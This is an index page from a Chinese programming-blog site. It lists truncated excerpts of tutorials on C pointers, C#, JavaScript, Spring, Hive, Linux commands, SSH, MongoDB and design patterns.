    C语言指针说难不难但是说容易又是最容易出错的地方,因此不管是你要做什么只要用到C指针你就跳不过,今天咱们就以十九个例子来给大家简单的分析一下指针的应用,最后会有C语言视频资料提供给大家更加深入的参考。进入今天的主题,要了解指针,多多少少会出现一些比较复杂的类型,所以我先介绍一下如何完全理解一个复杂类型,要理解复杂类型其实很简单,一个类型里会出现很多运算符,他们也像普通的表达式一样,有优先级,其优先
  • C# 浅克隆与深克隆 wangnaisheng C#c#
    在C#中,浅克隆(ShallowClone)和深克隆(DeepClone)是两种常见的对象克隆技术,用于创建对象的新副本。它们的主要区别在于复制对象的层次和属性的处理方式。浅克隆(ShallowCopy)当进行浅克隆时,一个新的对象实例被创建,原始对象的所有字段(成员变量)的值都被复制到新对象中。但是,如果这些字段包含引用类型(如类、数组或其他复杂类型),那么复制的是引用而不是引用的对象内容本身。
  • JavaScript对象----内置对象常用方法及案例 美貌与智慧并存的妞 JavaScript
    目录jQuery对象为什么要有对象什么是对象JavaScript中的对象对象字面量对象创建方式属性和方法new关键字this详解对象的使用遍历对象的属性删除对象的属性简单类型和复杂类型的区别内置对象MDN如何学习一个方法?Math对象Date对象Array对象基本包装类型String对象jQuery对象为什么要有对象functionprintPerson(name,age,sex....){}//
  • Spring Bean 依赖注入常见错误(下) xiaoshitou_2015 springjava后端
    在实际应用中,我们也会使用@Value等不太常见的注解来完成自动注入,同时也存在注入到集合、数组等复杂类型的场景。这些情况下,我们也会遇到一些问题。所以这一讲我们不妨来梳理下。案例1:@Value没有注入预期的值在装配对象成员属性时,我们常常会使用@Autowired来装配。但是,有时候我们也使用@Value进行装配。不过这两种注解使用风格不同,使用@Autowired一般都不会设置属性值,而@V
  • TS系列之typeof 菜鸡爱上编程 TS前端javascripttypescript
    TS系列之typeof这里写目录标题前言回顾:Js中typeof的用法1、typeof的返回类型有哪些Ts中的typeof运算符作为类型判断的工具什么是typeof?类型保护与条件类型复杂类型总结前言今天总结一下typeof相关的知识。typeof在Js中也是常用来判断变量类型的关键字,那么在Ts中的作用又是什么,下面一起来看看。回顾:Js中typeof的用法1、typeof的返回类型有哪些“un
  • mysql hive 数据类型_Hive数据类型 王火龙果 mysqlhive数据类型
    本章介绍Hive不同的数据类型,用于创建表。Hive所有数据类型分为四种类型,给出如下:列类型文字Null值复杂类型列类型列类型被用作Hive的列数据类型。它们如下:整型整型数据可以指定使用整型数据类型,INT。当数据范围超过INT的范围,需要使用BIGINT,如果数据范围比INT小,使用SMALLINT。TINYINT比SMALLINT小。下表描述了各种INT数据类型:类型后缀示例TINYINT
  • hive 数据类型 java_Hive - 数据类型 本本纲目 hive数据类型java
    本章将带您了解Hive中涉及表创建的不同数据类型。Hive中的所有数据类型分为四种类型,具体如下:列类型字面空值复杂类型列类型列类型用作Hive的列数据类型。他们如下:积分类型整型数据可以使用整型数据类型INT来指定。当数据范围超出INT范围时,需要使用BIGINT,如果数据范围小于INT,则使用SMALLINT。TINYINT比SMALLINT小。下表描述了各种INT数据类型:类型后缀例TINY
  • ༺༽༾ཊ—设计-原-06-型-模式—ཏ༿༼༻ __water 1024程序员节c#设计模式
    名称:原型模式类型:创建型目的:当有多个抽象角色时使用的一种工厂模式。抽象工厂模式可以向客户端提供一个接口,使客户端在不必指定产品的具体情况下,创建多个产品族中的产品对象,总体来说:对复杂创建类型进行自我复制,常与建造者模式结合使用优点:1.具体产品在应用层的代码隔离无需关系创建的细节2.将一个系列的产品统一到一起创建两种方式可以实现克隆,实现,解析:通过对(孙悟空类)复杂类的自我复制拓展功能解决
  • JavaScript隐式转换 LBJ辉 JavaScriptjavascript前端
    你所忽略的js隐式转换1、js数据类型js中有7种数据类型,可以分为两类:原始类型、对象类型:基础类型(原始值):undefined、null、String、Number、Boolean、Symbol(es6新出的,本文不讨论这种类型)复杂类型(对象值):object2、三种隐式转换类型js中一个难点就是js隐形转换,因为js在一些操作符下其类型会做一些变化,所以js灵活,同时造成易出错,并且难以
  • JS-数组相关 Turbosaa JavaScriptjavascript前端
    文章目录数组介绍创建数组数组特性数组塌陷数组介绍数组是js中的一种复杂类型数据array一组有序数据的列表私人解释:可以装载有序数据的“盒子”数组中可以存储多个任意类型的数据注意:一般一个数组中存储的数据类型都是一致的创建数组字面量创建语法:变量=[]得到一个空数组语法:变量=[数据,数据,数据...]得到一个有数据的数组数组中每个数据之间通过逗号分隔注意:逗号之间没有数据则会产生空数据empty
  • Java常用排序算法/程序员必须掌握的8大排序算法 cugfy java
    分类: 1)插入排序(直接插入排序、希尔排序) 2)交换排序(冒泡排序、快速排序) 3)选择排序(直接选择排序、堆排序) 4)归并排序 5)分配排序(基数排序) 所需辅助空间最多:归并排序 所需辅助空间最少:堆排序 平均速度最快:快速排序 不稳定:快速排序,希尔排序,堆排序。 先来看看8种排序之间的关系:   1.直接插入排序 (1
  • 【Spark102】Spark存储模块BlockManager剖析 bit1129 manager
    Spark围绕着BlockManager构建了存储模块,包括RDD,Shuffle,Broadcast的存储都使用了BlockManager。而BlockManager在实现上是一个针对每个应用的Master/Executor结构,即Driver上BlockManager充当了Master角色,而各个Slave上(具体到应用范围,就是Executor)的BlockManager充当了Slave角色
  • linux 查看端口被占用情况详解 daizj linux端口占用netstatlsof
    经常在启动一个程序会碰到端口被占用,这里讲一下怎么查看端口是否被占用,及哪个程序占用,怎么Kill掉已占用端口的程序   1、lsof -i:port port为端口号   [root@slave /data/spark-1.4.0-bin-cdh4]# lsof -i:8080 COMMAND   PID USER   FD   TY
  • Hosts文件使用 周凡杨 hostslocahost
         一切都要从localhost说起,经常在tomcat容器起动后,访问页面时输入http://localhost:8088/index.jsp,大家都知道localhost代表本机地址,如果本机IP是10.10.134.21,那就相当于http://10.10.134.21:8088/index.jsp,有时候也会看到http: 127.0.0.1:
  • java excel工具 g21121 Java excel
    直接上代码,一看就懂,利用的是jxl: import java.io.File; import java.io.IOException; import jxl.Cell; import jxl.Sheet; import jxl.Workbook; import jxl.read.biff.BiffException; import jxl.write.Label; import
  • web报表工具finereport常用函数的用法总结(数组函数) 老A不折腾 finereportweb报表函数总结
    ADD2ARRAY ADDARRAY(array,insertArray, start):在数组第start个位置插入insertArray中的所有元素,再返回该数组。 示例: ADDARRAY([3,4, 1, 5, 7], [23, 43, 22], 3)返回[3, 4, 23, 43, 22, 1, 5, 7]. ADDARRAY([3,4, 1, 5, 7], "测试&q
  • 游戏服务器网络带宽负载计算 墙头上一根草 服务器
    家庭所安装的4M,8M宽带。其中M是指,Mbits/S 其中要提前说明的是: 8bits = 1Byte 即8位等于1字节。我们硬盘大小50G。意思是50*1024M字节,约为 50000多字节。但是网宽是以“位”为单位的,所以,8Mbits就是1M字节。是容积体积的单位。 8Mbits/s后面的S是秒。8Mbits/s意思是 每秒8M位,即每秒1M字节。 我是在计算我们网络流量时想到的
  • 我的spring学习笔记2-IoC(反向控制 依赖注入) aijuans Spring 3 系列
    IoC(反向控制 依赖注入)这是Spring提出来了,这也是Spring一大特色。这里我不用多说,我们看Spring教程就可以了解。当然我们不用Spring也可以用IoC,下面我将介绍不用Spring的IoC。 IoC不是框架,她是java的技术,如今大多数轻量级的容器都会用到IoC技术。这里我就用一个例子来说明: 如:程序中有 Mysql.calss 、Oracle.class 、SqlSe
  • 高性能mysql 之 选择存储引擎(一) annan211 mysqlInnoDBMySQL引擎存储引擎
    1 没有特殊情况,应尽可能使用InnoDB存储引擎。   原因:InnoDB 和 MYIsAM 是mysql 最常用、使用最普遍的存储引擎。其中InnoDB是最重要、最广泛的存储引擎。她   被设计用来处理大量的短期事务。短期事务大部分情况下是正常提交的,很少有回滚的情况。InnoDB的性能和自动崩溃   恢复特性使得她在非事务型存储的需求中也非常流行,除非有非常
  • UDP网络编程 百合不是茶 UDP编程局域网组播
      UDP是基于无连接的,不可靠的传输   与TCP/IP相反       UDP实现私聊,发送方式客户端,接受方式服务器 package netUDP_sc; import java.net.DatagramPacket; import java.net.DatagramSocket; import java.net.Ine
  • JQuery对象的val()方法执行结果分析 bijian1013 JavaScriptjsjquery
            JavaScript中,如果id对应的标签不存在(同理JAVA中,如果对象不存在),则调用它的方法会报错或抛异常。在实际开发中,发现JQuery在id对应的标签不存在时,调其val()方法不会报错,结果是undefined。        
  • http请求测试实例(采用json-lib解析) bijian1013 jsonhttp
            由于fastjson只支持JDK1.5版本,因些对于JDK1.4的项目,可以采用json-lib来解析JSON数据。如下是http请求的另外一种写法,仅供参考。 package com; import java.util.HashMap; import java.util.Map; import
  • 【RPC框架Hessian四】Hessian与Spring集成 bit1129 hessian
    在【RPC框架Hessian二】Hessian 对象序列化和反序列化一文中介绍了基于Hessian的RPC服务的实现步骤,在那里使用Hessian提供的API完成基于Hessian的RPC服务开发和客户端调用,本文使用Spring对Hessian的集成来实现Hessian的RPC调用。   定义模型、接口和服务器端代码 |---Model    &nb
  • 【Mahout三】基于Mahout CBayes算法的20newsgroup流程分析 bit1129 Mahout
    1.Mahout环境搭建  1.下载Mahout http://mirror.bit.edu.cn/apache/mahout/0.10.0/mahout-distribution-0.10.0.tar.gz    2.解压Mahout  3. 配置环境变量 vim /etc/profile export HADOOP_HOME=/home
  • nginx负载tomcat遇非80时的转发问题 ronin47
      nginx负载后端容器是tomcat(其它容器如WAS,JBOSS暂没发现这个问题)非80端口,遇到跳转异常问题。解决的思路是:$host:port        详细如下:    该问题是最先发现的,由于之前对nginx不是特别的熟悉所以该问题是个入门级别的: ? 1 2 3 4 5
  • java-17-在一个字符串中找到第一个只出现一次的字符 bylijinnan java
    public class FirstShowOnlyOnceElement { /**Q17.在一个字符串中找到第一个只出现一次的字符。如输入abaccdeff,则输出b * 1.int[] count:count[i]表示i对应字符出现的次数 * 2.将26个英文字母映射:a-z <--> 0-25 * 3.假设全部字母都是小写 */ pu
  • mongoDB 复制集 开窍的石头 mongodb
    mongo的复制集就像mysql的主从数据库,当你往其中的主复制集(primary)写数据的时候,副复制集(secondary)会自动同步主复制集(Primary)的数据,当主复制集挂掉以后其中的一个副复制集会自动成为主复制集。提供服务器的可用性。和防止当机问题             mo
  • [宇宙与天文]宇宙时代的经济学 comsci 经济
        宇宙尺度的交通工具一般都体型巨大,造价高昂。。。。。      在宇宙中进行航行,近程采用反作用力类型的发动机,需要消耗少量矿石燃料,中远程航行要采用量子或者聚变反应堆发动机,进行超空间跳跃,要消耗大量高纯度水晶体能源      以目前地球上国家的经济发展水平来讲,
  • Git忽略文件 Cwind git
         有很多文件不必使用git管理。例如Eclipse或其他IDE生成的项目文件,编译生成的各种目标或临时文件等。使用git status时,会在Untracked files里面看到这些文件列表,在一次需要添加的文件比较多时(使用git add . / git add -u),会把这些所有的未跟踪文件添加进索引。 ==== ==== ==== 一些牢骚
  • MySQL连接数据库的必须配置 dashuaifu mysql连接数据库配置
    MySQL连接数据库的必须配置   1.driverClass:com.mysql.jdbc.Driver   2.jdbcUrl:jdbc:mysql://localhost:3306/dbname   3.user:username   4.password:password   其中1是驱动名;2是url,这里的‘dbna
  • 一生要养成的60个习惯 dcj3sjt126com 习惯
    一生要养成的60个习惯 第1篇 让你更受大家欢迎的习惯 1 守时,不准时赴约,让别人等,会失去很多机会。 如何做到: ①该起床时就起床, ②养成任何事情都提前15分钟的习惯。 ③带本可以随时阅读的书,如果早了就拿出来读读。 ④有条理,生活没条理最容易耽误时间。 ⑤提前计划:将重要和不重要的事情岔开。 ⑥今天就准备好明天要穿的衣服。 ⑦按时睡觉,这会让按时起床更容易。 2 注重
  • [介绍]Yii 是什么 dcj3sjt126com PHPyii2
    Yii 是一个高性能,基于组件的 PHP 框架,用于快速开发现代 Web 应用程序。名字 Yii (读作 易)在中文里有“极致简单与不断演变”两重含义,也可看作 Yes It Is! 的缩写。 Yii 最适合做什么? Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应
  • Linux SSH常用总结 eksliang linux sshSSHD
    转载请出自出处:http://eksliang.iteye.com/blog/2186931 一、连接到远程主机   格式: ssh name@remoteserver 例如: ssh [email protected]   二、连接到远程主机指定的端口   格式: ssh name@remoteserver -p 22 例如: ssh i
  • 快速上传头像到服务端工具类FaceUtil gundumw100 android
    快速迭代用 import java.io.DataOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOExceptio
  • jQuery入门之怎么使用 ini JavaScripthtmljqueryWebcss
    jQuery的强大我何问起(个人主页:hovertree.com)就不用多说了,那么怎么使用jQuery呢?   首先,下载jquery。下载地址:http://hovertree.com/hvtart/bjae/b8627323101a4994.htm,一个是压缩版本,一个是未压缩版本,如果在开发测试阶段,可以使用未压缩版本,实际应用一般使用压缩版本(min)。然后就在页面上引用。
  • 带filter的hbase查询优化 kane_xie 查询优化hbaseRandomRowFilter
    问题描述 hbase scan数据缓慢,server端出现LeaseException。hbase写入缓慢。   问题原因 直接原因是: hbase client端每次和regionserver交互的时候,都会在服务器端生成一个Lease,Lease的有效期由参数hbase.regionserver.lease.period确定。如果hbase scan需
  • java设计模式-单例模式 men4661273 java单例枚举反射IOC
             单例模式1,饿汉模式 //饿汉式单例类.在类初始化时,已经自行实例化 public class Singleton1 { //私有的默认构造函数 private Singleton1() {} //已经自行实例化 private static final Singleton1 singl
  • mongodb 查询某一天所有信息的3种方法,根据日期查询 qiaolevip 每天进步一点点学习永无止境mongodb纵观千象
    // mongodb的查询真让人难以琢磨,就查询单天信息,都需要花费一番功夫才行。 // 第一种方式: coll.aggregate([ {$project:{sendDate: {$substr: ['$sendTime', 0, 10]}, sendTime: 1, content:1}}, {$match:{sendDate: '2015-
  • 二维数组转换成JSON tangqi609567707 java二维数组json
    原文出处:http://blog.csdn.net/springsen/article/details/7833596 public class Demo {     public static void main(String[] args) {        String[][] blogL
  • erlang supervisor wudixiaotie erlang
    定义supervisor时,如果是监控celuesimple_one_for_one则删除children的时候就用supervisor:terminate_child (SupModuleName, ChildPid),如果shutdown策略选择的是brutal_kill,那么supervisor会调用exit(ChildPid, kill),这样的话如果Child的behavior是gen_
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他